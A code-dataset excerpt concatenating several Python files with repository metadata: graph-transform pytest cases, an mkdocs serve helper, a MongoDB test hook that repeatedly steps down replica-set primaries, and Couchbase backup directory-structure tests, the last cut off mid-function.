},
},
{'filename': os.path.join(TARGET_DIR, 'graph4s2'), 'format': 'jsonl'},
133,
13,
),
],
)
def test_transform2(query):
"""
Test loading data from JSON source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s3'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': [
'subject',
'predicate',
'object',
'relation',
'category',
'fusion',
'homology',
'combined_score',
'cooccurrence',
],
},
7,
6,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{'filename': os.path.join(TARGET_DIR, 'graph2s3.json'), 'format': 'json'},
7,
6,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{'filename': os.path.join(TARGET_DIR, 'graph3s3'), 'format': 'jsonl'},
7,
6,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')],
'format': 'nt',
'edge_filters': {
'subject_category': {'biolink:Gene', 'biolink:Protein'},
'object_category': {'biolink:Gene', 'biolink:Protein'},
'predicate': {'biolink:has_gene_product', 'biolink:interacts_with'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph4s3'), 'format': 'jsonl'},
6,
3,
),
],
)
def test_transform3(query):
"""
Test loading data from RDF source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s4'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'category'],
},
176,
206,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'filename': os.path.join(TARGET_DIR, 'graph2s4'),
'format': 'jsonl',
},
176,
206,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'filename': os.path.join(TARGET_DIR, 'graph3s4.nt'),
'format': 'nt',
},
176,
206,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')],
'format': 'obojson',
'edge_filters': {
'subject_category': {'biolink:BiologicalProcess'},
'predicate': {'biolink:subclass_of'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph4s4'), 'format': 'jsonl'},
72,
73,
),
],
)
def test_transform4(query):
"""
Test loading data from RDF source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{
'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')],
'format': 'owl',
},
{
'filename': os.path.join(TARGET_DIR, 'graph1s5'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'category'],
},
220,
1050,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')], 'format': 'owl'},
{'filename': os.path.join(TARGET_DIR, 'graph2s5'), 'format': 'jsonl'},
220,
1050,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')], 'format': 'owl'},
{'filename': os.path.join(TARGET_DIR, 'graph3s5.nt'), 'format': 'nt'},
220,
1050,
),
# (
# {
# 'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')],
# 'format': 'owl',
# 'edge_filters': {
# 'subject_category': {'biolink:BiologicalProcess'},
# 'predicate': {'biolink:subclass_of'}
# }
# },
# {
# 'filename': os.path.join(TARGET_DIR, 'graph4s5'),
# 'format': 'jsonl'
# },
# 220,
# 1050
# )
],
)
def test_transform5(query):
"""
Test transforming data from an OWL source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.parametrize(
'query',
[
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph1s6'),
'format': 'tsv',
'node_properties': ['id', 'name', 'category', 'description', 'provided_by'],
'edge_properties': ['subject', 'predicate', 'object', 'relation', 'category'],
},
4,
3,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph2s6.json'),
'format': 'json',
},
4,
3,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph3s6'),
'format': 'jsonl',
},
4,
3,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'filename': os.path.join(TARGET_DIR, 'graph4s6.nt'),
'format': 'nt',
},
4,
3,
),
(
{
'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')],
'format': 'trapi-json',
'edge_filters': {
'subject_category': {'biolink:Disease'},
},
},
{'filename': os.path.join(TARGET_DIR, 'graph5s6'), 'format': 'jsonl'},
2,
0,
),
],
)
def test_transform6(query):
"""
Test transforming data from RDF source and writing to various sinks.
"""
run_transform(query)
@pytest.mark.skip()
@pytest.mark.parametrize(
'query',
[
(
{
'filename': [
os.path.join(RESOURCE_DIR, 'graph_nodes.tsv'),
os.path.join(RESOURCE_DIR, 'graph_edges.tsv'),
],
'format': 'tsv',
},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'graph.json')], 'format': 'json'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
512,
532,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rdf', 'test3.nt')], 'format': 'nt'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
7,
6,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.json')], 'format': 'obojson'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
176,
206,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'goslim_generic.owl')], 'format': 'owl'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
220,
1050,
),
(
{'filename': [os.path.join(RESOURCE_DIR, 'rsa_sample.json')], 'format': 'trapi-json'},
{
'uri': DEFAULT_NEO4J_URL,
'username': DEFAULT_NEO4J_USERNAME,
'password': DEFAULT_NEO4J_PASSWORD,
'format': 'neo4j',
},
4,
3,
),
],
)
def test_transform7(clean_slate, query):
"""
Test transforming data from various sources to a Neo4j sink.
"""
run_transform(query)
| 30.976103
| 99
| 0.449588
|
cfd7e5453a477bbb72a06928cc21ca6efa256267
| 213
|
py
|
Python
|
update_serve.py
|
ArtemFomenko/emlid-docs
|
3c764c2062d9a2fd1be11c1f6763ed308cdc8ce7
|
[
"BSD-2-Clause"
] | 58
|
2019-02-26T07:42:54.000Z
|
2021-11-10T13:36:51.000Z
|
update_serve.py
|
ArtemFomenko/emlid-docs
|
3c764c2062d9a2fd1be11c1f6763ed308cdc8ce7
|
[
"BSD-2-Clause"
] | 20
|
2019-02-28T14:42:32.000Z
|
2021-04-13T14:10:35.000Z
|
update_serve.py
|
ArtemFomenko/emlid-docs
|
3c764c2062d9a2fd1be11c1f6763ed308cdc8ce7
|
[
"BSD-2-Clause"
] | 54
|
2019-02-22T15:37:00.000Z
|
2021-11-24T22:12:07.000Z
|
from build import Builder
import sys, os
if __name__ == "__main__":
renderer = Builder(sys.argv[1])
renderer.render_all_templates()
os.system("mkdocs serve -f" + sys.argv[1])
| 23.666667
| 50
| 0.610329
|
6645f18308769bc7730b010e43ccbfec19815270
| 18,979
|
py
|
Python
|
buildscripts/resmokelib/testing/hooks/stepdown.py
|
norttung/mongo
|
a5e78c5cac31b22983cf4fc546329a85c0927fe9
|
[
"Apache-2.0"
] | 1
|
2018-03-07T22:12:35.000Z
|
2018-03-07T22:12:35.000Z
|
buildscripts/resmokelib/testing/hooks/stepdown.py
|
norttung/mongo
|
a5e78c5cac31b22983cf4fc546329a85c0927fe9
|
[
"Apache-2.0"
] | null | null | null |
buildscripts/resmokelib/testing/hooks/stepdown.py
|
norttung/mongo
|
a5e78c5cac31b22983cf4fc546329a85c0927fe9
|
[
"Apache-2.0"
] | null | null | null |
"""Test hook that periodically makes the primary of a replica set step down."""
from __future__ import absolute_import
import collections
import os.path
import random
import threading
import time
import bson
import pymongo.errors
from buildscripts.resmokelib import errors
from buildscripts.resmokelib import utils
from buildscripts.resmokelib.testing.hooks import interface
from buildscripts.resmokelib.testing.fixtures import replicaset
from buildscripts.resmokelib.testing.fixtures import shardedcluster
class ContinuousStepdown(interface.Hook): # pylint: disable=too-many-instance-attributes
"""Regularly connect to replica sets and send a replSetStepDown command."""
DESCRIPTION = ("Continuous stepdown (steps down the primary of replica sets at regular"
" intervals)")
def __init__( # pylint: disable=too-many-arguments
self, hook_logger, fixture, config_stepdown=True, shard_stepdown=True,
stepdown_duration_secs=10, stepdown_interval_ms=8000, terminate=False, kill=False,
use_stepdown_permitted_file=False, use_stepping_down_file=False,
wait_for_mongos_retarget=False):
"""Initialize the ContinuousStepdown.
Args:
hook_logger: the logger instance for this hook.
fixture: the target fixture (a replica set or sharded cluster).
config_stepdown: whether to stepdown the CSRS.
shard_stepdown: whether to stepdown the shard replica sets in a sharded cluster.
stepdown_duration_secs: the number of seconds to step down the primary.
stepdown_interval_ms: the number of milliseconds between stepdowns.
terminate: shut down the node cleanly as a means of stepping it down.
kill: With a 50% probability, kill the node instead of shutting it down cleanly.
use_stepdown_permitted_file: use a file to control if stepdown thread should do a stepdown.
use_stepping_down_file: use a file to denote when stepdown is active.
wait_for_mongos_retarget: whether to run validate on all mongoses for each collection
in each database, after pausing the stepdown thread.
Note that the "terminate" and "kill" arguments are named after the "SIGTERM" and
"SIGKILL" signals that are used to stop the process. On Windows, there are no signals,
so we use a different means to achieve the same result as sending SIGTERM or SIGKILL.
"""
interface.Hook.__init__(self, hook_logger, fixture, ContinuousStepdown.DESCRIPTION)
self._fixture = fixture
self._config_stepdown = config_stepdown
self._shard_stepdown = shard_stepdown
self._stepdown_duration_secs = stepdown_duration_secs
self._stepdown_interval_secs = float(stepdown_interval_ms) / 1000
self._wait_for_mongos_retarget = wait_for_mongos_retarget
self._rs_fixtures = []
self._mongos_fixtures = []
self._stepdown_thread = None
# kill implies terminate.
self._terminate = terminate or kill
self._kill = kill
# The stepdown file names need to match the same construction as found in
# jstests/concurrency/fsm_libs/resmoke_runner.js.
dbpath_prefix = fixture.get_dbpath_prefix()
if use_stepdown_permitted_file:
self._stepdown_permitted_file = os.path.join(
dbpath_prefix, "concurrency_sharded_stepdown_stepdown_permitted")
else:
self._stepdown_permitted_file = None
if use_stepping_down_file:
self._stepping_down_file = os.path.join(dbpath_prefix,
"concurrency_sharded_stepdown_stepping_down")
else:
self._stepping_down_file = None
def before_suite(self, test_report):
"""Before suite."""
if not self._rs_fixtures:
self._add_fixture(self._fixture)
utils.remove_if_exists(self._stepdown_permitted_file)
utils.remove_if_exists(self._stepping_down_file)
self._stepdown_thread = _StepdownThread(
self.logger, self._mongos_fixtures, self._rs_fixtures, self._stepdown_interval_secs,
self._stepdown_duration_secs, self._terminate, self._kill,
self._stepdown_permitted_file, self._stepping_down_file, self._wait_for_mongos_retarget)
self.logger.info("Starting the stepdown thread.")
self._stepdown_thread.start()
def after_suite(self, test_report):
"""After suite."""
self.logger.info("Stopping the stepdown thread.")
self._stepdown_thread.stop()
self.logger.info("Stepdown thread stopped.")
def before_test(self, test, test_report):
"""Before test."""
self._check_thread()
self.logger.info("Resuming the stepdown thread.")
# Once the stepdown thread has started any files it creates must be deleted within the
# thread, since the Windows file handle is still open.
self._stepdown_thread.pause()
self._stepdown_thread.clean_stepdown_files()
self._stepdown_thread.resume()
def after_test(self, test, test_report):
"""After test."""
self._check_thread()
self.logger.info("Pausing the stepdown thread.")
self._stepdown_thread.pause()
self.logger.info("Paused the stepdown thread.")
def _check_thread(self):
if not self._stepdown_thread.is_alive():
msg = "The stepdown thread is not running."
self.logger.error(msg)
raise errors.ServerFailure(msg)
def _add_fixture(self, fixture):
if isinstance(fixture, replicaset.ReplicaSetFixture):
if not fixture.all_nodes_electable:
raise ValueError(
"The replica sets that are the target of the ContinuousStepdown hook must have"
" the 'all_nodes_electable' option set.")
self._rs_fixtures.append(fixture)
elif isinstance(fixture, shardedcluster.ShardedClusterFixture):
if self._shard_stepdown:
for shard_fixture in fixture.shards:
self._add_fixture(shard_fixture)
if self._config_stepdown:
self._add_fixture(fixture.configsvr)
if self._wait_for_mongos_retarget:
for mongos_fixture in fixture.mongos:
self._mongos_fixtures.append(mongos_fixture)
class _StepdownThread(threading.Thread): # pylint: disable=too-many-instance-attributes
def __init__( # pylint: disable=too-many-arguments
self, logger, mongos_fixtures, rs_fixtures, stepdown_interval_secs,
stepdown_duration_secs, terminate, kill, stepdown_permitted_file, stepping_down_file,
wait_for_mongos_retarget):
"""Initialize _StepdownThread."""
threading.Thread.__init__(self, name="StepdownThread")
self.daemon = True
self.logger = logger
self._mongos_fixtures = mongos_fixtures
self._rs_fixtures = rs_fixtures
self._stepdown_interval_secs = stepdown_interval_secs
self._stepdown_duration_secs = stepdown_duration_secs
self._terminate = terminate
self._kill = kill
self._stepdown_permitted_file = stepdown_permitted_file
self._stepping_down_file = stepping_down_file
self._should_wait_for_mongos_retarget = wait_for_mongos_retarget
self._last_exec = time.time()
# Event set when the thread has been stopped using the 'stop()' method.
self._is_stopped_evt = threading.Event()
# Event set when the thread is not paused.
self._is_resumed_evt = threading.Event()
self._is_resumed_evt.set()
# Event set when the thread is not performing stepdowns.
self._is_idle_evt = threading.Event()
self._is_idle_evt.set()
self._step_up_stats = collections.Counter()
def run(self):
"""Execute the thread."""
if not self._rs_fixtures:
self.logger.warning("No replica set on which to run stepdowns.")
return
while True:
if self._is_stopped():
break
self._wait_for_permission_or_resume()
now = time.time()
if now - self._last_exec > self._stepdown_interval_secs:
self.logger.info("Starting stepdown of all primaries")
self._step_down_all()
# Wait until each replica set has a primary, so the test can make progress.
self._await_primaries()
self._last_exec = time.time()
self.logger.info("Completed stepdown of all primaries in %0d ms",
(self._last_exec - now) * 1000)
now = time.time()
if self._is_permitted():
# The 'wait_secs' is used to wait 'self._stepdown_interval_secs' from the moment
# the last stepdown command was sent.
wait_secs = max(0, self._stepdown_interval_secs - (now - self._last_exec))
self._wait(wait_secs)
def stop(self):
"""Stop the thread."""
self._is_stopped_evt.set()
# Unpause to allow the thread to finish.
self.resume()
self.join()
def _is_stopped(self):
return self._is_stopped_evt.is_set()
def pause(self):
"""Pause the thread."""
self._is_resumed_evt.clear()
# Wait until we are no longer executing stepdowns.
self._is_idle_evt.wait()
# Wait until we all the replica sets have primaries.
self._await_primaries()
# Wait for Mongos to retarget the primary for each shard and the config server.
self._do_wait_for_mongos_retarget()
def resume(self):
"""Resume the thread."""
self._is_resumed_evt.set()
self.logger.info(
"Current statistics about which nodes have been successfully stepped up: %s",
self._step_up_stats)
def _wait_for_permission_or_resume(self):
# Wait until stop, _stepdown_permitted_file or resume.
if self._stepdown_permitted_file:
while not os.path.isfile(self._stepdown_permitted_file) and not self._is_stopped():
# Set a short sleep during busy wait time for self._stepdown_permitted_file.
self._wait(0.1)
else:
self._is_resumed_evt.wait()
def _wait(self, timeout):
# Wait until stop or timeout.
self._is_stopped_evt.wait(timeout)
def _await_primaries(self):
for fixture in self._rs_fixtures:
fixture.get_primary()
def _step_down_all(self):
self._is_idle_evt.clear()
self._stepdown_starting()
try:
if self._is_permitted():
for rs_fixture in self._rs_fixtures:
self._step_down(rs_fixture)
finally:
self._stepdown_completed()
self._is_idle_evt.set()
def _step_down(self, rs_fixture):
try:
primary = rs_fixture.get_primary(timeout_secs=self._stepdown_interval_secs)
except errors.ServerFailure:
# We ignore the ServerFailure exception because it means a primary wasn't available.
# We'll try again after self._stepdown_interval_secs seconds.
return
secondaries = rs_fixture.get_secondaries()
# Check that the fixture is still running before stepping down or killing the primary.
# This ensures we still detect some cases in which the fixture has already crashed.
if not rs_fixture.is_running():
raise errors.ServerFailure("ReplicaSetFixture expected to be running in"
" ContinuousStepdown, but wasn't.")
if self._terminate:
should_kill = self._kill and random.choice([True, False])
action = "Killing" if should_kill else "Terminating"
self.logger.info("%s the primary on port %d of replica set '%s'.", action, primary.port,
rs_fixture.replset_name)
primary.mongod.stop(kill=should_kill)
primary.mongod.wait()
else:
self.logger.info("Stepping down the primary on port %d of replica set '%s'.",
primary.port, rs_fixture.replset_name)
try:
client = primary.mongo_client()
client.admin.command(
bson.SON([
("replSetStepDown", self._stepdown_duration_secs),
("force", True),
]))
except pymongo.errors.AutoReconnect:
# AutoReconnect exceptions are expected as connections are closed during stepdown.
pass
except pymongo.errors.PyMongoError:
self.logger.exception(
"Error while stepping down the primary on port %d of replica set '%s'.",
primary.port, rs_fixture.replset_name)
raise
# We pick arbitrary secondary to run for election immediately in order to avoid a long
# period where the replica set doesn't have write availability. If none of the secondaries
# are eligible, or their election attempt fails, then we'll simply not have write
# availability until the self._stepdown_duration_secs duration expires and 'primary' steps
# back up again.
while secondaries:
chosen = random.choice(secondaries)
self.logger.info("Attempting to step up the secondary on port %d of replica set '%s'.",
chosen.port, rs_fixture.replset_name)
try:
client = chosen.mongo_client()
client.admin.command("replSetStepUp")
break
except pymongo.errors.OperationFailure:
# OperationFailure exceptions are expected when the election attempt fails due to
# not receiving enough votes. This can happen when the 'chosen' secondary's opTime
# is behind that of other secondaries. We handle this by attempting to elect a
# different secondary.
self.logger.info("Failed to step up the secondary on port %d of replica set '%s'.",
chosen.port, rs_fixture.replset_name)
secondaries.remove(chosen)
if self._terminate:
self.logger.info("Attempting to restart the old primary on port %d of replica set '%s.",
primary.port, rs_fixture.replset_name)
# Restart the mongod on the old primary and wait until we can contact it again. Keep the
# original preserve_dbpath to restore after restarting the mongod.
original_preserve_dbpath = primary.preserve_dbpath
primary.preserve_dbpath = True
try:
primary.setup()
primary.await_ready()
finally:
primary.preserve_dbpath = original_preserve_dbpath
# Bump the counter for the chosen secondary to indicate that the replSetStepUp command
# executed successfully.
key = "{}/{}".format(rs_fixture.replset_name,
chosen.get_internal_connection_string() if secondaries else "none")
self._step_up_stats[key] += 1
def _do_wait_for_mongos_retarget(self): # pylint: disable=too-many-branches
"""Run collStats on each collection in each database on each mongos.
This is to ensure mongos can target the primary for each shard with data, including the
config servers.
"""
if not self._should_wait_for_mongos_retarget:
return
for mongos_fixture in self._mongos_fixtures:
mongos_conn_str = mongos_fixture.get_internal_connection_string()
try:
client = mongos_fixture.mongo_client()
except pymongo.errors.AutoReconnect:
pass
for db in client.database_names():
self.logger.info("Waiting for mongos %s to retarget db: %s", mongos_conn_str, db)
start_time = time.time()
while True:
try:
coll_names = client[db].collection_names()
break
except pymongo.errors.NotMasterError:
pass
retarget_time = time.time() - start_time
if retarget_time >= 60:
self.logger.exception(
"Timeout waiting for mongos: %s to retarget to db: %s", mongos_conn_str,
db)
raise # pylint: disable=misplaced-bare-raise
time.sleep(0.2)
for coll in coll_names:
while True:
try:
client[db].command({"collStats": coll})
break
except pymongo.errors.NotMasterError:
pass
retarget_time = time.time() - start_time
if retarget_time >= 60:
self.logger.exception(
"Timeout waiting for mongos: %s to retarget to db: %s",
mongos_conn_str, db)
raise # pylint: disable=misplaced-bare-raise
time.sleep(0.2)
retarget_time = time.time() - start_time
self.logger.info("Finished waiting for mongos: %s to retarget db: %s, in %d ms",
mongos_conn_str, db, retarget_time * 1000)
def _is_permitted(self):
"""Permit a stepdown if the permitted file is not specified or it exists.
The self._permitted_file is created by an external framework, i.e., JS tests.
"""
if self._stepdown_permitted_file:
return os.path.isfile(self._stepdown_permitted_file)
return self._is_resumed_evt.is_set()
def _stepdown_starting(self):
"""Create self._stepping_down_file, if specified."""
if self._stepping_down_file:
if os.path.isfile(self._stepping_down_file):
raise # pylint: disable=misplaced-bare-raise
with open(self._stepping_down_file, "w") as fh:
fh.write("")
def _stepdown_completed(self):
"""Delete self._stepping_down_file, if specified."""
utils.remove_if_exists(self._stepping_down_file)
def clean_stepdown_files(self):
"""Remove the stepdown files."""
utils.remove_if_exists(self._stepdown_permitted_file)
utils.remove_if_exists(self._stepping_down_file)
| 45.513189
| 103
| 0.625586
|
2f91cbec1a2fa6a9bac553bde282603a18a18082
| 28,865
|
py
|
Python
|
pytests/backup/ibr.py
|
sumedhpb/testrunner
|
9ff887231c75571624abc31a3fb5248110e01203
|
[
"Apache-2.0"
] | 14
|
2015-02-06T02:47:57.000Z
|
2020-03-14T15:06:05.000Z
|
pytests/backup/ibr.py
|
sumedhpb/testrunner
|
9ff887231c75571624abc31a3fb5248110e01203
|
[
"Apache-2.0"
] | 3
|
2019-02-27T19:29:11.000Z
|
2021-06-02T02:14:27.000Z
|
pytests/backup/ibr.py
|
sumedhpb/testrunner
|
9ff887231c75571624abc31a3fb5248110e01203
|
[
"Apache-2.0"
] | 108
|
2015-03-26T08:58:49.000Z
|
2022-03-21T05:21:39.000Z
|
__author__ = 'ashvinder'
import re
import os
import gc
import logger
import time
from TestInput import TestInputSingleton
from backup.backup_base import BackupBaseTest
from remote.remote_util import RemoteMachineShellConnection
from couchbase_helper.documentgenerator import BlobGenerator
from couchbase_helper.documentgenerator import DocumentGenerator
from memcached.helper.kvstore import KVStore
from membase.api.rest_client import RestConnection, Bucket
from couchbase_helper.data_analysis_helper import *
from memcached.helper.data_helper import VBucketAwareMemcached
from view.spatialquerytests import SimpleDataSet
from view.spatialquerytests import SpatialQueryTests
from membase.helper.spatial_helper import SpatialHelper
from couchbase_helper.cluster import Cluster
from membase.helper.bucket_helper import BucketOperationHelper
from couchbase_helper.document import DesignDocument, View
import copy
class IBRTests(BackupBaseTest):
def setUp(self):
super(IBRTests, self).setUp()
self.num_mutate_items = self.input.param("mutate_items", 1000)
gen_load = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_load, "create", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a full backup
if not self.command_options:
self.command_options = []
options = self.command_options + [' -m full']
self.total_backups = 1
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
def tearDown(self):
super(IBRTests, self).tearDown()
def restoreAndVerify(self, bucket_names, kvs_before, expected_error=None):
for bucket in self.buckets:
bucket.kvs[1] = kvs_before[bucket.name]
del kvs_before
gc.collect()
errors, outputs = self.shell.restore_backupFile(self.couchbase_login_info, self.backup_location, bucket_names)
errors.extend(outputs)
error_found = False
if expected_error:
for line in errors:
if line.find(expected_error) != -1:
error_found = True
break
self.assertTrue(error_found, "Expected error not found: %s" % expected_error)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
if expected_error:
for bucket in self.buckets:
bucket.kvs[1] = KVStore()
self.verify_results(self.master)
self._verify_stats_all_buckets(self.servers[:self.num_servers])
def verify_dir_structure(self, total_backups, buckets, nodes):
cmd = 'find ' + self.backup_location + ' -type f'
if self.shell.info.type.lower() == 'windows':
cmd = 'cmd.exe /C "dir /s /b C:\\tmp\\backup"'
output, error = self.shell.execute_command(cmd)
self.log.info("output = {0} error = {1}".format(output, error))
if error:
raise Exception('Got error {0}', format(error))
expected_design_json = total_backups * buckets
expected_data_cbb = total_backups * buckets * nodes
expected_meta_json = total_backups * buckets * nodes
expected_failover_json = total_backups * buckets * nodes
timestamp = '\d{4}\-\d{2}\-\d{2}T\d+Z'
pattern_mode = '(full|accu|diff)'
timestamp_backup = timestamp + '\-' + pattern_mode
pattern_bucket = 'bucket-\w+'
pattern_node = 'node\-\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}.+'
pattern_design_json = timestamp + '/|\\\\' + timestamp_backup + \
'/|\\\\' + pattern_bucket
pattern_backup_files = pattern_design_json + '/|\\\\' + pattern_node
data_cbb = 0
failover = 0
meta_json = 0
design_json = 0
for line in output:
if 'data-0000.cbb' in line:
if re.search(pattern_backup_files, line):
data_cbb += 1
if 'failover.json' in line:
if re.search(pattern_backup_files, line):
failover += 1
if self.cb_version[:5] != "4.5.1" and 'meta.json' in line:
if re.search(pattern_backup_files, line):
meta_json += 1
if 'design.json' in line:
if re.search(pattern_design_json, line):
design_json += 1
self.log.info("expected_data_cbb {0} data_cbb {1}"
.format(expected_data_cbb, data_cbb))
self.log.info("expected_failover_json {0} failover {1}"
.format(expected_failover_json, failover))
if self.cb_version[:5] != "4.5.1":
self.log.info("expected_meta_json {0} meta_json {1}"
.format(expected_meta_json, meta_json))
""" add json support later in this test
self.log.info("expected_design_json {0} design_json {1}"
.format(expected_design_json, design_json)) """
if self.cb_version[:5] != "4.5.1":
if data_cbb == expected_data_cbb and failover == expected_failover_json and \
meta_json == expected_meta_json:
# add support later in and design_json == expected_design_json:
return True
else:
if data_cbb == expected_data_cbb and failover == expected_failover_json:
return True
return False
def testFullBackupDirStructure(self):
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Full Backup')
def testMultipleFullBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m full']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(120)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Full Backup')
def testIncrBackupDirStructure(self):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Incremental Backup')
def testMultipleIncrBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.log.info("sleeping for 30 secs")
self.sleep(30)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Incremental Backup')
def testMultipleDiffBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Differential Backup')
def testMultipleIncrDiffBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a diff backup
options = self.command_options + [' -m diff']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
self.total_backups += 1
self.sleep(60)
if not self.verify_dir_structure(self.total_backups, len(self.buckets), len(self.servers)):
raise Exception('Backup Directory Verification Failed for Combo Incr and Diff Backup')
def testMultipleFullIncrDiffBackupDirStructure(self):
for count in range(10):
# Update data
gen_update = BlobGenerator('testdata', 'testdata-', self.value_size, end=self.num_items)
self._load_all_buckets(self.master, gen_update, "update", 0, 1, self.item_flag, True, batch_size=20000,
pause_secs=5, timeout_secs=180)
self._wait_for_stats_all_buckets(self.servers[:self.num_servers])
#Take a incremental backup
options = self.command_options + [' -m accu']
self.shell.execute_cluster_backup(self.couchbase_login_info, self.backup_location, options)
